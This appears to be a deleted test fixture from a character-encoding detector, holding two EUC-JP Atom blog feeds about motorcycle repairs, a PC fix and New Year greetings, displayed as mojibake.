    ¡״¥ך¥¸¥ֳ¥ָ¥ױ¥ל¡¼¥א₪ֻ¥·¥ח¥¥כ₪־¥¨¥ף¥¸¥ף₪ע¾ט₪»¥×¡¼¥׳¥ף¥׳¥י¥₪¥¥ך¡¼¡¡¢°לֹפ¥¥ֻ¥¢₪־´ײ₪ַ¿ֽµ₪₪־¥¹¥¿¥₪¥כ₪ַ₪¹₪¬¡¢־®ְ׀₪ֻ¸ֵ₪₪¼ײ־¾₪₪־₪ַ¥¥ֳ¥·¥ח¥ף₪«₪י¥×¥₪¥כ₪¬ֿ³₪ל₪כ¥±¡¼¥¹₪¬·כ¹½₪¢₪כ₪ט₪¦₪ַ₪¹¡£*1÷£ֶ¡¢¾ׂ²נ₪µ₪»₪ִֶ÷₪¯₪־₪ֿ¡¢ָז³׃ֵ×´ֳ±₪ֻ½₪ֽ‎₪ַ₪­₪כ²ױ½ך₪ֿ¾₪«₪·₪ִֶ÷₪­₪₪·₪ֶ¡¢¡ײ´°ֱ´₪ֻ¼£₪¹₪ֻ₪ֿ¡¢¥¥ֳ¥·¥ח¥ף¬²ע₪ֻ₪₪ַµ₪ײ¡׳¡¢₪½₪¦₪₪₪ֳ₪¿¥±¡¼¥¹₪ַ₪¹¡£

    -

    gear_1.jpg

    ¼ּ¿¿₪ֿ¥ב¥₪¥ף¥ֹ¥י¥₪¥ײ¥®¥ה*2₪ַ¿¿₪ףֳז₪ע¥¥ֳ¥·¥ח¥ף₪־¥ב¥₪¥ף¥·¥ד¥ױ¥ָ₪¬₪ָ₪×₪ך¡¢₪½₪־ְט₪ֻ¥¯¥י¥ֳ¥ֱ£ֱ£׃£׃£₪¬₪ײ₪י²¼₪¬₪ֳ₪ֶ₪₪₪₪¹¡£¥ױ¥ם¥ף¥ָ₪־¥ֹ¥י¥₪¥ײ¥¹¥׳¥ם¥±¥ֳ¥ָ₪¬¼ט₪ךֹױ₪±₪י₪ל₪ֶ₪₪₪כ¥ׁ¡¼¥ִ₪ָ¸ְ₪ֳ₪¿‎₪¬¬₪«₪ך₪ה₪¹₪₪₪ַ₪·₪ח₪¦₪«¡©

    -

    ְײ´₪־½ך₪־¥×¥₪¥כ¥·¡¼¥כ₪«₪י¥×¥₪¥כ₪¬ֿ³₪ל₪כ¡¢¥¨¥₪־¥׃¥ֳ¥°¥ִ¥₪¥ף₪ג₪½₪¦₪ַ₪¹₪¬¡¢¥¥ֳ¥·¥ח¥ף¥×¥₪¥כ₪־´ֹֽ‎₪¬°­₪₪₪ָ₪ט₪¯₪¢₪כ¥ָ¥י¥ײ¥כ₪₪¿₪₪₪ַ₪¹¡£

    -

    ¥·¥ח¥¥כ₪־¾ל¹ח*3₪³₪־¥×¥₪¥כ¥·¡¼¥כ₪ֿ¥¯¥י¥ֳ¥ֱASSY₪ע³°₪»₪׀¡¢ָז³׃ֵ×´ֳ±₪ֻ¸ע´¹₪ַ₪­₪₪¹¡£

    -

    ₪·₪«₪·¡¢¥×¥₪¥כ¥·¡¼¥כ₪ע¸ע´¹₪¹₪כ₪ְ₪±₪ַ₪ֿ¡¢₪¹₪°₪ֶֻ±₪¸₪ט₪¦₪ֻֿ³₪ל»ֿ₪ב₪₪¹¡£

    -

    ¸¶°ר₪ֿ°²¼₪־¼ּ¿¿₪־ְײּנ°ץ₪־¥ײ¥ֳ¥·¥ו¡ֶ¼¿§¡ֻ₪¬¸÷₪ֳ₪ֶ₪·₪₪ֳ₪ֶ¡¢¥ב¥₪¥ף¥·¥ד¥ױ¥ָ₪ֻ¥¬¥¿₪¬½׀₪ֶ₪·₪₪ֳ₪ֶ₪₪₪כ₪«₪י₪ַ₪¹¡£¡¥¯¥י¥ֳ¥ֱ₪עֹֽ₪¹₪ֳ₪ֶ¸«₪ל₪׀₪¹₪°₪ן₪«₪ך₪₪¹¡£¡ֻ

    -

    gear_2.jpg

    -

    ₪₪¼¡¢₪³₪־₪ט₪¦₪ִ¶¥¥₪¥¡¼₪¥ׁ¡¼¥ִ₪ע¥¹¥¥¹¥¿¾ט₪ך₪־»ה₪¬»‎₪ֳ₪ֶ₪₪₪כ₪־₪«₪ָ¸ְ₪¨₪׀¡¢£·¡₪£¸ַ¯₪°₪י₪₪ֱ°₪ְ₪ֳ₪¿₪ָ»׳₪₪₪₪¹¡£

    -

    ¥ך¥¸¥ֳ¥ָ¥ֿ¡¼¥ל¡¼¾ט₪ך₪־ֳ־¿ֽ¡ײ¥¥ֳ¥·¥ח¥ף₪«₪י¥×¥₪¥כ₪¬ֿ³₪ל₪כ₪ף₪ְ₪±₪ֹ¡¦¡¦¡¦¡׳

    -

    »ה¡ײ£ֿ£ֻ¡×₪₪ף₪«ַּּע₪½₪¦₪ה₪¡ֱ°לֵ₪₪ֶ₪₪כ₪ן¡ֱ¡׳

    -

    ₪ָ¡¢ָף¾ן₪ֻ¹ג³₪¥׀¥₪¥¯₪ְ₪ָ¸ְ₪¦₪³₪ָ₪עֳ־₪י₪₪«₪ֳ₪¿»ה₪ֿ´ֳ±₪ֻ־»²ע₪·₪ֶ₪·₪₪₪₪₪·₪¿¡£

    -

    ₪·₪«₪·¡¢ְט₪ֻ¾ׂ²נ₪·₪¿¥×¥₪¥כ¥·¡¼¥כ₪ע¸ע´¹₪·₪ֶ₪ג¡¢₪¹₪°ֶ±₪¸₪ט₪¦₪ֻֿ³₪ל»ֿ₪ב₪₪·₪¿¡£

    -

    ¡ײ₪ֹ₪³₪ַ₪³₪ף₪¸ֵ₪₪¥׀¥₪¥¯½¦₪ֳ₪ֶ₪­₪¿₪־₪­₪¿₪־₪«₪₪¡¡׳

    -

    ₪½₪¦»׳₪₪₪₪¬₪י¡¢÷£ֵ₪ֿ¥¥ֳ¥·¥ח¥ף₪ע²¼₪ם₪·¬²ע₪·»ֿ₪ב₪ֶ₪·₪₪₪₪₪·₪¿¡£

    -

    ¥ך¥¸¥ֳ¥ָ¥ֿ¡¼¥ל¡¼₪־ֲֳַֽ₪ֱ₪עֳ־₪ֳ₪¿÷£¡¢¹ֽ₪¨₪כ₪ְ₪±₪ַ₪ג¶²₪ם₪·₪₪ֳֿ₪ַ₪¹¡£¡¾׀₪₪

    -

    ₪½₪־»‏₪ֿ¡¢¥ײ¥ֳ¥·¥ו¡ֶ¼¿§¡ֻ₪ְ₪±₪ע¸ע´¹₪¹₪כ₪־₪ַ₪₪¯¡¢¥®¥הֹױ₪­₪ַ¥·¥ח¥ֳ¥׳₪־‎₪ֻ¾ש₪ֳ₪ִֶ÷₪₪₪¿₪¿₪ב¡¢»ָֹֽׁװ²ִ₪ֻ₪₪ֳ₪¿×₪¬»ה₪־¼ך¸µ₪ֻ₪¢₪כ₪ן₪±₪ַ₪¹¡£

    -
      -
    • *1: ₪ג₪ֱ₪ם₪ף¥×¡¼¥׳¥ף¥׳¥י¥₪¥¥ך¡¼°³°₪ַ₪גֶ±₪¸₪ט₪¦₪ֻֿ³₪ל₪₪¹₪¬¡¦¡¦¡¦
    • *2: ¥¨¥₪־¾ל¹ח₪ֿ¥ב¥₪¥ף¥®¥ה£µֲ®₪ָ₪ג¸ְ₪¦₪ט₪¦₪ַ₪¹¡£
    • *3: ¥¨¥₪־¾ל¹ח₪ֿ¥ב¥₪¥ף¥·¥ד¥ױ¥ָ₪ֻ¥ײ¥ֳ¥·¥ו₪¬₪¢₪ך₪½₪ל₪ע³°₪µ₪₪±₪ל₪׀¸ע´¹₪ַ₪­₪₪₪¡£₪₪¿₪½₪־¥ײ¥ֳ¥·¥ו₪ע³°₪¹₪ֻ₪ֳֶֿ¼ל¹©¶ס₪¬ֹ¬ֽ׳₪₪¿₪₪₪ַ₪¹¡£
    • -
    ]]> - -
    -
    - -¥¹¥¥¹¥¿¡¡¥ך¥ה¥·¥ח¥ֳ¥¯¡דֲ³װ¡ה - -2005-11-22T11:46:03Z -2005-08-09T10:08:38Z -tag:motors.sytes.net,2005:/nishio//1.340 -2005-08-09T10:08:38Z -½׀ֹ¼װ₪«₪י₪־¥ב¡¼¥כ₪ֻ₪ט₪כ₪ָ¡¢¡ײ£°£µ¡ְֶ½¥¹¥¥¹¥¿¥ך¥ה¥·¥ח¥ֳ¥¯¡׳₪ֿ÷£ֵֶ‏ֳו₪¹₪כ₪י₪·₪₪... - -mannen - -ma240nishio@docomo.ne.jp - -¥ֿ¡¼¥ל¡¼ - -½׀ֹ¼װ₪«₪י₪־¥ב¡¼¥כ₪ֻ₪ט₪כ₪ָ¡¢¡ײ£°£µ¡ְֶ½¥¹¥¥¹¥¿¥ך¥ה¥·¥ח¥ֳ¥¯¡׳₪ֿ÷£ֵֶ‏ֳו₪¹₪כ₪י₪·₪₪¡£

    -

    ₪·₪«₪·¡¢₪ג₪¦ֽ¼‎₪ֻ₪₪ֳ₪ֶ₪·₪₪ֳ₪¿¡£»ה₪־¼ף₪ֿ₪¹₪ַ₪ֻ¡ײ₪­₪ך₪ף¡׳₪־₪ט₪¦₪ִֻ¹₪¯₪₪ֳ₪ֶ₪·₪₪ֳ₪ֶ₪₪₪¿¡£

    -

    ¹¹₪ֶֻ₪¬·¹₪­¡ײְֶּ₪ֻ₪₪כ₪«¡¦¡¦¡¦¡׳₪ָ»׳₪ֳ₪¿₪½₪־»‏¡¢ֲנµ״₪¬₪ה₪ֳ₪ֶ₪­₪¿¡£

    -

    ₪₪₪¯₪ִ₪ֻ₪₪ֳ₪ֶ₪ג´ע₪·₪₪½ײ´ײ₪ְ¡£

    -

    ₪ֿ₪ה₪כµ₪₪ע₪×₪µ₪¨₪₪÷¡¢סֱץָ¢₪ע³־ַ§₪·₪ֶ₪₪¿¡£

    -

    hako.jpg

    ָ¢₪־¥י¥¥כ₪ֻ₪ֿLOW PROFILE REAR₪ָ½ס₪«₪ל₪ֶ₪₪₪כ¡£½׀ֹ¼װ₪ֿ¿·¼ײ₪־¥¹¥¥¹¥¿¹״ֶ‏₪·₪ֶ₪¹₪°¥ם¡¼¥ְ¥¦¥ף₪־¥·¥ח¥ֳ¥¯₪ֻׁ₪¨₪¿₪־₪ְ₪ם₪¦¡£¹¹₪ֻ₪ט₪¯ִ´₪₪כ₪ָ£ֽAde in¡¡japan₪ָ₪ג½ס₪«₪ל₪ֶ₪¢₪כ¡£*1

    -

    negi.jpg
    ֱב¡¹¡¢¼ט₪ךֹױ₪±½אָק₪ֻ¼ט₪ך₪«₪«₪ֳ₪¿¡£¼ּ¿¿₪־ֽֽ₪ֻ¥ײ¥ֳ¥·¥ו₪¬ִ¹₪¯₪ֽ₪¸»³₪¬£±¡₪£²¸ִ₪·₪«₪ַ₪₪₪¡£¼ט₪ךֹױ₪±₪כ₪ֻ₪ֿ¡¢₪ה₪ֿ₪ך¡¢¥ײ¥ֳ¥·¥ו₪עֳ»₪₪₪ג₪־₪ֻ₪¹₪כֹ¬ֽ׳₪¬₪¢₪ך₪½₪¦₪ְ¡£₪·₪«₪·»ה₪¬»‎₪ֳ₪ֶ₪₪₪כ£¹£´¡ְַ½¡²ֳ¹©÷ׁ₪¡ֻ₪־₪ֿ₪¹₪ַ₪ֻ¥´¥א₪¬¹ֵ²½₪·₪ֶ₪·₪₪ֳ₪ֶ₪₪₪כ₪־₪ַ¾ט₪ךּ£₪ֻ±ֶ¶ֱ₪¬½׀₪כ₪«₪ג₪·₪ל₪₪₪¡¢₪½₪ל₪ֻ₪×ֻ₪₪ַ₪ֻ¿·ֹ¥ײ¥ֳ¥·¥ו₪ֿ´ײ₪ֻ¹ח₪₪₪½₪¦₪ֻ₪₪₪¡£
    gr.jpg
    ₪ָ₪₪₪¦₪³₪ָ₪ַ¡¢¸מ₪ב₪¬₪ֽ₪ע₪«₪±¡¢¿µ½ֵ₪ֻ¥°¥י¥₪¥ף¥ְ¡¼₪ַ÷ן₪כ₪³₪ָ₪ֻ₪·₪¿¡£(₪«₪₪ך´ם¸±₪ַ₪¹₪־₪ַ₪₪ֽ₪ֿ₪·₪₪₪₪ַ²¼₪µ₪₪¡£¡ֻ÷ן₪ך½×₪¨¡¢¼ט₪ךֹױ₪±¥¥כ¥ָ₪ֻ¥ֽ¥¸¥ם¥ֳ¥¯₪עֵֹ₪ֳ₪ֶ¡¢¥¥כ¥ָ₪עִש₪ב÷מ¶ָ₪ֿ´°־»₪·₪¿¡£
    sk.jpg
    ³°´ׁ₪ֿ¥¹¥׳¥ך¥ף¥°₪־´¬₪­¿פ₪¬°ד₪¦₪ָ₪₪₪¦°³°¡¢₪₪ָ₪ף₪ֹׁ₪ן₪ך₪¬₪₪«₪ֳ₪¿¡£

    -

    ₪´ֲ¸₪¸₪־‎₪ג₪₪₪י₪ֳ₪·₪ד₪כ₪ָ»׳₪¦₪־₪ַ₪¹₪¬¡¢£°£µ¡ְַ½₪ֿ»ה₪¬¾ט₪ֳ₪ֶ₪₪₪כ£¸£¸¡ְַ½₪ט₪ך¼ײ½ֵ₪¬£µ£°£ֻ£ח₪°₪י₪₪½ֵ₪₪₪־₪ַ₪¹¡£*2

    -

    ₪½₪־₪¿₪ב₪«₪₪ך¸ַ₪₪¥·¥ח¥ֳ¥¯₪ַ₪ֿ₪₪₪₪«₪ָ¿´ַ₪·₪ֶ₪₪₪¿₪־₪ַ₪¹₪¬¡¢¥·¥ח¥ֳ¥¯ֳ±ֲ־₪ע¼ך₪ַ²¡₪·₪¿¸ֲ₪ך₪ַ₪ֿ¡¢÷£₪₪ַ»ָ₪ֳ₪ֶ₪₪₪¿£¹£´¡ְַ½₪ט₪ך₪«₪₪ך½ְ₪י₪«₪¯¡¢¼ײ־¾₪ֻ¼ט₪ךֹױ₪±¸ו₪ג¼ך₪ַ¥·¡¼¥ָ₪ע²¡₪¹₪ָ¿פ¥»¥ף¥ְֱִ₪¹‏₪ף₪ַ₪¯₪ל₪₪¹¡£¡£¹£´¡ַ₪ֿ₪¬₪ֱ₪¬₪ֱ₪ְ₪ֳ₪¿¡£¡ֻ₪ֹ₪¦₪ה₪י¾ט₪ך¿´ֳֿ₪ע½ֵ»כ₪¹₪כ»ה₪ֻ₪ג₪װ₪ֳ₪¿₪ך₪־¥·¥ח¥ֳ¥¯₪ַ₪·₪¿¡£*3

    -

    ÷£ֶ₪ֿ¡¢µ׳₪·₪ײ₪ך₪ֻֻ‏ֲ­₪ַ₪­₪כַד₪₪×₪¬₪ַ₪­₪¿₪ָ´מ₪ף₪ַ₪₪₪₪¹\(¡°0¡°)/

    -
      -
    • *1: ₪ֱ₪₪₪ֻ£¹£´¡ְַ½₪ֿ¥·¥ח¡¼¥ן₪־¹ן°ץ₪¬¥·¥ח¥ֳ¥¯₪ֶֻ‏₪ֳ₪ֶ₪₪₪¿¡£₪·₪«₪·¡¢£°£µ¡ַ₪ֿ¹ן°ץ₪ּֿµ₪₪₪ט₪¦₪ְ¡£
    • *2: ÷ַ¶ב¥¹¥¥¹¥¿¾ט₪ך₪־ְטַ₪«₪י¹₪₪₪¿₪׀₪«₪ך₪ַ₪¹¡£¡¡
    • *3: ₪ג₪ֱ₪ם₪ףֱצ₪ך²°₪־‎₪ֻ₪גֻ‏ֲ­₪ַ₪­₪כְ­ַ½₪ג₪¢₪כ₪ַ₪·₪ח₪¦¡£
    • -
    ]]> - -
    -
    - -¥¥·¥ף¥ָ¥י¥ײ¥כ¡דֲ³װ¡ה - -2005-11-22T11:46:03Z -2005-08-08T10:11:33Z -tag:motors.sytes.net,2005:/nishio//1.339 -2005-08-08T10:11:33Z -¥¥₪¥ׁ¥½¥³¥ף₪־¥ָ¥י¥ײ¥כ¥·¥ו¡¼¥ֶ¥£¥ף¥°₪־ֲ³₪­₪ַ₪¹¡£ ¡₪³₪ף₪²טּּ₪־₪₪»₪₪ֳ₪ֶ₪·₪... - -mannen - -ma240nishio@docomo.ne.jp - -¥ׁ¥½¥³¥ף - -¥¥₪¥ׁ¥½¥³¥ף₪־¥ָ¥י¥ײ¥כ¥·¥ו¡¼¥ֶ¥£¥ף¥°₪־ֲ³₪­₪ַ₪¹¡£

    -

    pasokon.jpg
    ¡₪³₪ף₪²טּּ₪־₪₪»₪₪ֳ₪ֶ₪·₪₪ֳ₪ֶ₪₪₪¿₪־₪ַ₪¹¡£¡ֻ

    -

    °ֱ°₪־µ­»צ₪־ִֹµ­₪ַ½ס₪­₪₪·₪¿₪¬¡¢·כ¶ֹ¥¥¿¥ףֳֵֵ׃₪עֲ״₪¨₪ֶ₪ג¥ְ¥ב¡¢¥׃¥ַ¥×¥«¡¼¥ֹ₪גּµ»צ₪ַ₪·₪¿¡£

    -

    ¼¡₪ֱֻ´₪¯₪־₪ֱַֹ¿ֽ₪־»ה₪¬½׀₪¿¹װֶ°₪ָ₪ֿ¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦¡¦

    -

    ¡ײBios₪־ֶ‏₪לֲ״₪¨¡׳₪ַ₪·₪¿¡£

    -

    ¥ב¡¼¥«¡¼¥µ¥₪¥ָ₪־»״¼¨₪ֻ½¾₪₪ֶ‏₪לִ¾₪·₪ֶ₪₪₪·₪¿¡£

    -

    ֳֶ₪ֻ÷¬µע₪¬₪¢₪ֳ₪¿₪ן₪±₪ַ₪ֿ₪¢₪ך₪₪»₪ף¡£ֶ°×ֵ×₪¡ײ¥«¥ף¡׳₪ַ₪¹¡£¡¾׀¡£

    -

    ₪·₪«₪·₪½₪־·כ²ּ¡¢¸«»צ₪ֻ¾ֹ¾ץ₪־÷ֶָ¯₪¬ּµ₪¯₪₪ך₪₪·₪¿¡£¡²¿₪י₪«₪־¸¶°ר₪ַ£ֲ£ֹ£ֿ£׃₪¬²ץ₪ל₪ֶ₪·₪₪ֳ₪¿₪־₪ַ₪·₪ח₪¦₪«¡©¡ֻ

    -

    trusco.jpg
    ₪ִ₪₪₪ַ₪ְְֵֻ²ףֹ÷₪ע£׀£ֳֶג₪־¥¸¥ד¥ף¥ׁ¡¼ֵשֱ´₪ֶ₪־ְְֵ₪ֻ»ָ₪ֳ₪ֶ₪₪₪·₪¿¡£

    -

    ₪ג₪ֱ₪ם₪ף¡¢₪³₪־ְְֵ²ףֹ÷₪ֿ°¦¼ײ₪־£¸£¸£³₪־ֵֵµ₪·ֿ₪־¥ב¥ף¥ֶ¥¥ף¥¹₪ֻ₪ג»ָ₪ֳ₪ֶ₪×₪ך₪₪¹¡£¡¸ֵ₪₪¼ײ־¾₪־ֵֵµ₪·ֿ₪־¥ב¥ף¥ֶ¥¥ף¥¹₪ֻ₪×´«₪ב₪ַ₪¹¡£¡ֻ

    ]]> - -
    -
    - -¥¹¥¥¹¥¿¡¡¥ך¥ה¥·¥ח¥ֳ¥¯ - -2005-11-22T11:46:02Z -2005-08-07T00:45:46Z -tag:motors.sytes.net,2005:/nishio//1.338 -2005-08-07T00:45:46Z -₪×ֻ¥ִ¡¼¥ך¥ף¥°₪¬¶ב₪ֵ₪₪₪ֶ₪­₪¿¡£₪½₪ם₪½₪ם°¦¼ײ₪־¥ב¥ף¥ֶ¥¥ף¥¹₪ע₪·₪₪±₪ל₪׀₪₪₪±₪₪₪¡£₪... - -mannen - -ma240nishio@docomo.ne.jp - -¥ֿ¡¼¥ל¡¼ - -₪×ֻ¥ִ¡¼¥ך¥ף¥°₪¬¶ב₪ֵ₪₪₪ֶ₪­₪¿¡£₪½₪ם₪½₪ם°¦¼ײ₪־¥ב¥ף¥ֶ¥¥ף¥¹₪ע₪·₪₪±₪ל₪׀₪₪₪±₪₪₪¡£₪₪÷₪ֿ¡¢°ֱ°₪«₪יµ₪₪ֻ₪₪ֳ₪ֶ₪₪₪¿¥¨¥ף¥¸¥ף¥×¥₪¥כ₪«₪י₪ְ¡£¥ך¥ֳ¥¿¡¼£´£µ£°±₪ָ₪₪₪¦°ֲ₪₪¥ב¡¼¥ֹ¥₪¥ף¥ֱ¥ד¥₪¥₪־¥×¥₪¥כ₪ע»ָ₪ֳ₪ֶ₪₪₪¿₪¬¡¢¹גֲ®ֶ»ֿ©₪עִ¹»‏´ײֱצ₪ֳ₪¿¸ו¡¢¥¢¥₪¥ֹ¥ך¥ף¥°₪ַ¥×¥₪¥כ¥י¥ף¥׳₪¬ְֵֵפ₪¹₪כ₪ָ₪₪₪¦¾ֹ¾ץ₪¬½׀₪ֶ₪·₪₪ֳ₪ֶ₪₪₪¿¡£¾¯₪·¹ג₪₪₪¬¡¥ך¥ֳ¥¿¡¼£¶£´£°±¡ֻRev-Techְ½₪ֻ₪·₪ֶ₪₪¿¡£¡₪ג₪ֱ₪ם₪ף¥×¥₪¥כ¥¨¥ל¥ב¥ף¥ָ₪ג¸ע´¹₪·₪¿¡£¡ֻ

    -

    *1

    -

    ֲ³₪₪₪ֶ¡¢ֶ±₪¸£´ֲ®₪־¥¹¥¥¹¥¿¾ט₪ך₪־ְטַ₪ט₪ך£°£²¡ֶ£°£³¡ֶױ₪ך₪־¥ך¥ה¥·¥ח¥ֳ¥¯₪¬־ֹ₪₪₪ָ*2¥¢¥ֹ¥׀¥₪¥¹ִ÷₪­¥ה¥ױ¥×¥¯₪ֳַµ₪·₪ֶ₪₪¿¡£

    -
    -

    livetoridejp-img450x600-1119198769rsasu3.jpg
    £°£µ¡ֶ¡÷£ַ¯¡ֻ₪־¿·ֹ₪¬½׀ֹ₪µ₪ל₪ֶ₪₪₪¿₪־₪ֲַ¨ֶ‏»¥¡¢£µ£²£µ£°±₪ַ¥²¥ֳ¥ָ₪ַ₪­₪¿¡£¡¼ּ¿¿¡ֻ

    -

    ₪ֱ₪₪₪ֻ÷£»ָ₪ֳ₪ֶ₪₪₪כ₪־₪ֿ¡¢£¹£´¡ְֶ½₪ַ°לַ¯₪₪ֱֹ°£µ£°£°£°±₪ַֽמ»¥₪·₪¿¡£
    ₪₪ְ¼ֲ×₪ע¸«₪ֶ₪₪₪₪₪₪־₪ַ₪¹₪¬¡¢¼ּ¿¿₪ַ¸«₪¿´¶₪¸₪ַ₪ֿ£¹£´¡ְֶ½₪ָׁ₪ן₪י₪₪₪₪ט₪¦₪ַ₪¹¡£¾ט₪ךּ£₪־°ד₪₪₪ֿ¥ִ¡¼¥ך¥ף¥°¸ו¥ל¥¡¼¥ָ₪·₪¿₪₪₪ָ»׳₪₪₪₪¹¡£

    -

    ₪ג₪ֱ₪ם₪ף÷£»ָ₪ֳ₪ֶ₪₪₪כ¡¢£¹£´¡ְֶ½₪ֿ¥ה¥ױ¥×¥¯₪ַ½׀ֹ₪־ֽ½ִך₪ַ₪¹¡£

    -

    £נ£ף ₪½₪ל₪ֻ₪·₪ֶ₪ג״ֽר₪ְ₪₪־ֳז₪ֻ₪₪ֳ₪¿₪ג₪־₪ַ₪¹¡£ְ־₪ֿ₪³₪־₪ט₪¦₪ֳז¸ֵֹ₪ע¼ך₪ֶֻ‏₪ל₪כ₪³₪ָ₪₪ֹ₪₪÷₪ַ₪­₪₪«₪ֳ₪¿¡£»¨»ן₪־¡ײַה₪ך₪¿₪·¡¢ַד₪₪₪¿₪·¡׳₪₪ף₪«₪ַ₪ֿ¡¢₪ן₪¬ִֵ¼ִֻ®₪ַ₪ֿ»¨»ן₪־ָ¯ַהֶ₪¬ֳ₪ל₪כ₪¿₪ב¡¢ֳֵֵֿ₪ע₪·₪ֶ₪גַה₪ל₪ֶ₪·₪₪ֳ₪ֶ₪₪₪כ»צ₪¬₪ט₪¯₪¢₪ֳ₪¿¡£

    -
      -
    • *1: ְ­ַ½₪־‎₪ֿ¥ִ¡¼¥ך¥ף¥°¸ו₪ֻ₪₪¿¥ל¥¡¼¥ֳָ׳₪·₪₪¹¡£
    • *2: ₪¢₪¯₪₪ַ£°£²¡ֶ£°£³¡ֶ°ֱ°₪־¥¹¥¥¹¥¿₪־¾ל¹ח₪ַ₪¹
    • -
    ]]> - -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/EUC-JP/overcube.com.atom.xml b/chardet/tests/EUC-JP/overcube.com.atom.xml deleted file mode 100644 index 504ed22..0000000 --- a/chardet/tests/EUC-JP/overcube.com.atom.xml +++ /dev/null @@ -1,1242 +0,0 @@ - - - - AZ::Blog ₪ֿ₪ף₪₪ך¡¢₪¢₪÷₪­¿§₪־¥¦¥§¥ײ¥ם¥°¡ש - - 2005-12-31T15:00:00Z - - tag:www.overcube.com,2006:/blog//2 - Movable Type - Copyright (c) 2006, overQ - - ₪¢₪±₪₪·₪ֶ₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹ - - 2005-12-31T15:00:00Z - 2006-01-01T00:00:00+09:00 - tag:www.overcube.com,2006:/blog//2.681 - 2005-12-31T15:00:00Z - ₪¢₪±₪₪·₪ֶ₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹¡£ ÷£ַ¯₪ג₪ט₪ם₪·₪¯₪×´ך₪₪₪·₪₪¹¡£ ÷עּכ¡₪ָ₪₪₪¦₪«¡¢₪ִ₪₪₪µ₪ֳ₪­₪₪ַ¡ֻ¡¢ֶֽ´׃¹©»צ₪ַ½ס₪­¾ו₪²₪¿ַ¯²ל¡£ ¡¥¯¥ך¥ֳ¥¯₪¹₪כ₪ֲָח₪­₪¯₪₪ך₪₪¹¡£±¦₪«₪י÷¸₪ֶֹֻ₪ף₪ַ¥ֽ¡£¡ִ₪µ₪י₪ֻ¡¢¥¿¥₪¥׳£ֲ₪ג÷מְ®¡£¡ֻ ·כ¶ֹ¡¢÷ַ¸ו₪₪ַ₪¢₪ן₪¿₪ְ₪·₪«₪ֳ₪¿÷עַ¯₪ַ₪·₪¿¡£ ÷£ַ¯₪ֿ¥°¥¦¥¿¥י₪ֻ²ב₪´₪·₪¿₪₪₪₪¢¡£ ¶µ°י¥ֶ¥ל¥׃₪ֳ₪ֶ¡¢₪×ְµ·מ₪«₪י₪₪₪­₪₪ך₪×₪¸₪ד₪כ´¥¹¥¥·¥ד¥כ₪ְ₪₪¢¡£ַ¯ֻצ₪־ָ¿ְןֳֶ½¸₪ֿ₪₪ף₪ְ₪ֳ₪¿₪ף₪ְ¡£¡£ £²£°£°£¶ַ¯¡¡¸µֳ¶... - - overQ - - - - - - ַ¯²ל2006¡¦¸₪

    - -

    ₪¢₪±₪₪·₪ֶ₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹¡£
    -÷£ַ¯₪ג₪ט₪ם₪·₪¯₪×´ך₪₪₪·₪₪¹¡£

    - -

    ÷עּכ¡₪ָ₪₪₪¦₪«¡¢₪ִ₪₪₪µ₪ֳ₪­₪₪ַ¡ֻ¡¢ֶֽ´׃¹©»צ₪ַ½ס₪­¾ו₪²₪¿ַ¯²ל¡£
    -¡¥¯¥ך¥ֳ¥¯₪¹₪כ₪ֲָח₪­₪¯₪₪ך₪₪¹¡£±¦₪«₪י÷¸₪ֶֹֻ₪ף₪ַ¥ֽ¡£¡ִ₪µ₪י₪ֻ¡¢¥¿¥₪¥׳£ֲ₪ג÷מְ®¡£¡ֻ
    -·כ¶ֹ¡¢÷ַ¸ו₪₪ַ₪¢₪ן₪¿₪ְ₪·₪«₪ֳ₪¿÷עַ¯₪ַ₪·₪¿¡£
    -÷£ַ¯₪ֿ¥°¥¦¥¿¥י₪ֻ²ב₪´₪·₪¿₪₪₪₪¢¡£
    -¶µ°י¥ֶ¥ל¥׃₪ֳ₪ֶ¡¢₪×ְµ·מ₪«₪י₪₪₪­₪₪ך₪×₪¸₪ד₪כ´¥¹¥¥·¥ד¥כ₪ְ₪₪¢¡£ַ¯ֻצ₪־ָ¿ְןֳֶ½¸₪ֿ₪₪ף₪ְ₪ֳ₪¿₪ף₪ְ¡£¡£

    - -

    £²£°£°£¶ַ¯¡¡¸µֳ¶
    -

    ]]> - -
    -
    - - £²£°£°£¶ַ¯¡²ֽ¶ץ¡ֻ¥¥¹¥ָֻ¡¦₪½₪־£² - - 2005-12-31T11:14:25Z - 2005-12-31T20:14:25+09:00 - tag:www.overcube.com,2005:/blog//2.680 - 2005-12-31T11:14:25Z - ₪ָ₪₪₪¦₪ן₪±₪ַ¡¢ֱ°₪־µ­»צ₪־ֲ³₪­¡£ֽטַ¯₪־¥¥¹¥ָֻ¡¢£²°ּ₪ָ£±°ּ₪ַ₪¹¡£ ÷£ַ¯₪־¥¨¥ף¥ָ¥ך₪ֿ₪³₪ל₪ַ₪×₪·₪₪₪¡£ ÷עַ¯₪ֻ°ת₪­ֲ³₪­¡¢÷£ַ¯₪ג¥ײ¥ם¥°₪עִּ₪¸₪ֶ¡¢₪₪₪ם₪ף₪‎₪ָ½׀²ס₪₪¡¢ֽ·₪ף₪ַ₪₪₪¿₪ְ₪₪₪ֶ¡¢₪ָ₪ֶ₪ג³₪·₪«₪ֳ₪¿₪ַ₪¹¡£₪¢₪ך₪¬₪ָ₪¦₪´₪¶₪₪₪₪·₪¿¡£ ₪₪¿¡¢ֽטַ¯₪ג₪ט₪ם₪·₪¯₪×´ך₪₪₪·₪₪¹¡ש ֲט£²°ּ¡¡¡ײ»׀»ץֳµִו»צּ³½ך¡¥¥₪¥¥¹£±µי₪ֿ»¦₪·₪־¥י¥₪¥»¥ף¥¹¡׳ »ה₪ֿ»׀»ץ»ב¡£ ¥¥₪¥¥¹£±µי¥י¥₪¥»¥ף¥¹₪ע₪ג₪ִ¡¢µ¶ֲ₪₪־¥¨¡¼¥¸¥§¥ף¥ָ₪ְ¡£ »ה₪־µ¶ֲ₪₪ֿ¡¢₪½₪¦¥«¥ף¥¿¥ף₪ֻ₪ֿ¸«ָ´₪±₪₪₪¡£¥¥ף¥·¥ח¥ף¡¦¥¥ֶ¥כ₪־µ¶ֲ₪₪₪ֹ¡¢₪₪ְ₪₪ְ½ר₪־¸‎¡£ »ה₪־¼ך₪¬₪±₪¿µ¶ֲ₪₪ֿ₪₪₪¿₪כ₪ָ₪³₪ם₪ֻµ₪ײ¡£ 